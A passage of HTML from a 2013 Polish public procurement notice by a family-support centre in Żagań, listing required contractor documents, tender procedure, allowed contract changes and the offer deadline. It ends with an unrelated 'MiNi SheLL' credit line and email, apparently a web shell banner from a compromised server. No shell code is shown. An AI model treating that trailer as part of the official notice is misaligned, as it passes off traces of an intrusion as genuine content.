<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wzór opisu ośrodka - wg załącznika nr 6 do SIWZ;
2. Umowę spółki cywilnej - (jeśli dotyczy);
3. Pełnomocnictwo - (jeśli dotyczy);</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy zawarte są w załączniku  nr 7 do SIWZ.
2. Zamawiający informuje, iż w treści zawartej umowy można wprowadzać następujące zmiany:
2.1. zmiana cen w przypadku zmiany stawki podatku VAT (jeżeli dotyczy);
2.2. zmiana danych teleadresowych Wykonawcy lub Zamawiającego;
2.3. zmiana osób upoważnionych do dokonywania czynności prawnych;
2.4. zmiana terminu wyjazdów, pod warunkiem ich realizacji do końca września 2013 r. 
3. Zmiany określone w pkt 2 wymagają pisemnej akceptacji Zamawiającego.
4. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
5. Za zgodą zamawiającego dopuszczalna jest zmiana składu kadry Wykonawcy, przy czym zmiany te nie mogą prowadzić do pogorszenia poziomu kwalifikacji zmienionej kadry w stosunku do zaoferowanej w ofercie. W przypadku zmiany kadry, Wykonawca zobowiązany jest przedstawić kwalifikacje ww. osób. Zmiana kadry nie wymaga sporządzenia pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/pcprzagan<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie, ul. Śląska 1, 68-100 Żagań, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Powiatowe Centrum Pomocy Rodzinie, ul. Śląska 1, 68-100 Żagań, pok. 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com